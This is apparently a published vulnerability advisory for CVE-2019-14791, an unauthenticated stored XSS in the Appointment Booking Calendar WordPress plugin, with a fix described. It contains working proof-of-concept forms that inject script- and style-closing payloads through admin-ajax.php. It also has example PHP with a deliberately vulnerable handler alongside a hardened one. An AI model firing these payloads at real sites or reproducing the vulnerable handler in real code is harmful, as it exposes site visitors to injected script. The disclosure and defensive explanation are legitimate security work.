Appointment Booking Calendar <= 1.3.18 - Unauthenticated Stored XSS

Description

The cpabc_appointments_save_edition() function performs no authorisation check before saving the plugin's custom JavaScript/CSS, so an unauthenticated POST to admin-ajax.php can write arbitrary text through the editionarea parameter when cfwpp_edit is set to 'js' or 'css'. The stored text is later printed inside the corresponding <script> or <style> block on the front end, which results in stored XSS.
Proof of Concept

<!-- Inject into the JS edition area: the stored "</script>" closes the
     plugin's inline script block and the <svg> onload handler then runs. -->
<body onload="document.forms[0].submit();">
	<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
		<input type="hidden" name="CP_ABC_post_edition" value=""/>
		<input type="hidden" name="cfwpp_edit" value="js"/>
		<input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/>
	</form>
</body>

<!-- Same request against the CSS edition area, closing the <style> block instead. -->
<body onload="document.forms[0].submit();">
	<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
		<input type="hidden" name="CP_ABC_post_edition" value=""/>
		<input type="hidden" name="cfwpp_edit" value="css"/>
		<input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/>
	</form>
</body>

No session or nonce is required, so the same request can equally be sent directly with any HTTP client; the auto-submitting forms above are only a convenience. Once stored, the payload executes on every page that renders a booking form, for any visitor, with no further interaction.
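The following is an added illustration, not the plugin's source code, of the pattern the advisory describes and of the fix a reviewer would expect: an admin-ajax handler reachable without a session that stores raw JavaScript/CSS and later prints it inside <script>/<style> on the front end, followed by a hardened version with a capability check, a nonce check, and output filtering. The hook, option and function names (demo_*) are invented for the example; only the parameter names cfwpp_edit, editionarea and CP_ABC_post_edition are taken from the advisory.

```php
<?php
/*
 * Added example (not the plugin's code). Names prefixed demo_ are invented;
 * the request parameters match the ones in the advisory.
 */

/* ---- Vulnerable pattern ------------------------------------------------- */

// Registering the action under wp_ajax_nopriv_* makes it reachable with no
// session at all; with no capability or nonce check, anyone can POST to it.
add_action( 'wp_ajax_nopriv_demo_save_edition', 'demo_vuln_save_edition' );
add_action( 'wp_ajax_demo_save_edition',        'demo_vuln_save_edition' );

function demo_vuln_save_edition() {
    if ( ! isset( $_POST['CP_ABC_post_edition'] ) ) {
        wp_die();
    }
    $area = ( isset( $_POST['cfwpp_edit'] ) && $_POST['cfwpp_edit'] === 'css' ) ? 'css' : 'js';
    // Attacker-controlled text is stored verbatim.
    update_option( 'demo_custom_' . $area, wp_unslash( $_POST['editionarea'] ?? '' ) );
    wp_die();
}

// Front end: the stored text is printed inside a <script>/<style> block, so a
// value of "</script><svg/onload=...>" closes the block and the handler runs
// on every page that prints these assets.
function demo_vuln_print_assets() {
    echo '<script>' . get_option( 'demo_custom_js',  '' ) . '</script>';
    echo '<style>'  . get_option( 'demo_custom_css', '' ) . '</style>';
}

/* ---- Hardened form ------------------------------------------------------ */

// Only the authenticated hook is registered, and the handler still verifies
// both the capability and a nonce bound to the edit form.
add_action( 'wp_ajax_demo_save_edition_safe', 'demo_safe_save_edition' );

function demo_safe_save_edition() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'demo_edition_nonce', 'nonce' );

    $area = ( isset( $_POST['cfwpp_edit'] ) && $_POST['cfwpp_edit'] === 'css' ) ? 'css' : 'js';
    $text = isset( $_POST['editionarea'] ) ? wp_unslash( $_POST['editionarea'] ) : '';

    update_option( 'demo_custom_' . $area, $text );
    wp_send_json_success();
}

// Defence in depth on output: neutralise the one sequence that can close the
// enclosing <script>/<style> element. "</" never occurs in valid CSS; in JS,
// "<\/" inside a string or regex literal still decodes to "</", so only the
// rare unquoted form (e.g. a</b/) would change, an accepted trade-off here.
function demo_no_close_tag( $text ) {
    return str_replace( '</', '<\/', $text );
}

function demo_safe_print_assets() {
    echo '<script>' . demo_no_close_tag( get_option( 'demo_custom_js',  '' ) ) . '</script>';
    echo '<style>'  . demo_no_close_tag( get_option( 'demo_custom_css', '' ) ) . '</style>';
}
```

The authorisation and nonce checks are the actual fix for this class of bug; the output filter only limits the damage if a privileged account is compromised or another write path is found, since custom JS supplied by an administrator is trusted by design.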

Affects Plugin

Appointment Booking Calendar, fixed in version 1.3.19

References

CVE CVE-2019-14791
URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2117259%40appointment-booking-calendar&old=2112885%40appointment-booking-calendar

Classification

Type XSS
OWASP Top 10 (2017) A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Verified Yes
WPVDB ID 9426

Timeline

Publicly Published 2019-07-04
Added 2019-07-05
Last Updated 2019-11-27
